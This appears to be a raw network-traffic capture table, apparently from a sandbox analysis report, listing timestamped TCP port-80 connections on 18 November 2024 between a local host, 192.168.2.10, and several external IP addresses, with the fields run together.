                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.084147930 CET805024454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.084217072 CET5024480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.090652943 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.095509052 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.095571041 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.095639944 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.095658064 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.100667000 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.100677967 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.490986109 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.491089106 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.491113901 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.491147995 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.491234064 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.491234064 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.496506929 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.505971909 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.510946989 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.511780977 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.511780977 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.511780977 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.516993046 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.517015934 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.933017015 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.933749914 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.939521074 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.941766024 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.212932110 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.212949991 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.213099957 CET5024680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.213237047 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.217963934 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.218046904 CET5024780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.218106985 CET805024634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.218451023 CET805024744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.219376087 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.224442959 CET805024847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.224508047 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.322546005 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.322905064 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.327615023 CET805024847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.328107119 CET805024847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.444581985 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.449672937 CET8050249172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.449783087 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.677467108 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.677503109 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.682610035 CET8050249172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.682661057 CET8050249172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.124635935 CET8050249172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.124886990 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.125773907 CET5024980192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.129364014 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.130793095 CET8050249172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.135493994 CET8050250172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.135601997 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.135750055 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.135777950 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.140974045 CET8050250172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.140989065 CET8050250172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.704193115 CET805024847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.704348087 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.710047007 CET805024847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.710118055 CET5024880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.718338013 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.723248005 CET805025154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.723346949 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.723470926 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.723500013 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.728841066 CET805025154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.728863001 CET805025154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.799642086 CET8050250172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.799819946 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.799873114 CET5025080192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.805068016 CET8050250172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.821851969 CET5025280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.827004910 CET805025218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.827074051 CET5025280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.827243090 CET5025280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.827272892 CET5025280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.832355976 CET805025218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.832381964 CET805025218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.449845076 CET5025280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.453490019 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.458497047 CET805025318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.458597898 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.459031105 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.459084988 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.463907957 CET805025318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.464236021 CET805025318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.569506884 CET805025154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.569961071 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.575468063 CET805025154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.575522900 CET5025180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.583278894 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.588298082 CET80502543.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.588387966 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.588444948 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.588454962 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.593393087 CET80502543.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.593403101 CET80502543.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.253416061 CET80502543.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.254757881 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.260776043 CET80502543.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.260855913 CET5025480192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.324220896 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.329339981 CET805025518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.329442024 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.330183029 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.330202103 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.335247040 CET805025518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.335258961 CET805025518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.932851076 CET805025318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.933192968 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.940880060 CET805025318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.940962076 CET5025380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.974869967 CET5025680192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.979944944 CET805025682.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.980050087 CET5025680192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.980165005 CET5025680192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.980185032 CET5025680192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.985011101 CET805025682.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.985024929 CET805025682.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.010440111 CET805025518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.010833979 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.016736984 CET805025518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.016845942 CET5025580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.073424101 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.078618050 CET805025718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.078699112 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.078814983 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.078835964 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.083920956 CET805025718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.083969116 CET805025718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.914247990 CET805025718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.914442062 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.923907042 CET805025718.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.924002886 CET5025780192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.930892944 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.935915947 CET80502583.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.936000109 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.936116934 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.936136007 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.941576958 CET80502583.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.941593885 CET80502583.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.604707956 CET80502583.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.604867935 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.611047983 CET80502583.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.611093998 CET5025880192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.618593931 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.624003887 CET805025935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.624079943 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.624169111 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.624218941 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.629956007 CET805025935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.630021095 CET805025935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.450208902 CET5025680192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.451756954 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.457087040 CET805026082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.457247019 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.457429886 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.457447052 CET5026080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.462510109 CET805026082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.462526083 CET805026082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.470406055 CET805025935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.470668077 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.476303101 CET805025935.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.476381063 CET5025980192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.484524012 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.489795923 CET805026118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.489902020 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.489985943 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.490005970 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.494987965 CET805026118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.495624065 CET805026118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.174329996 CET805026118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.174621105 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.180120945 CET805026118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.180205107 CET5026180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.280251026 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.285918951 CET805026254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.286039114 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.286309004 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.286334991 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.291522026 CET805026254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.291533947 CET805026254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.118010044 CET805026254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.118179083 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.123903036 CET805026254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.123966932 CET5026280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.133351088 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.138451099 CET805026318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.138549089 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.163139105 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.163559914 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.170398951 CET805026318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.171535969 CET805026318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.971522093 CET805026318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.971702099 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.977125883 CET805026318.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.977252007 CET5026380192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.985476971 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.990484953 CET805026454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.990602970 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.990746021 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.990765095 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.995717049 CET805026454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.995738983 CET805026454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.831163883 CET805026454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.831393003 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.839191914 CET805026454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.839273930 CET5026480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.846163988 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.853022099 CET805026518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.853302002 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.853302002 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.853765965 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.860073090 CET805026518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.860095978 CET805026518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.307637930 CET805026518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.308005095 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.313307047 CET805026518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.313397884 CET5026580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.320631981 CET5026680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.325614929 CET805026654.244.188.177192.168.2.10
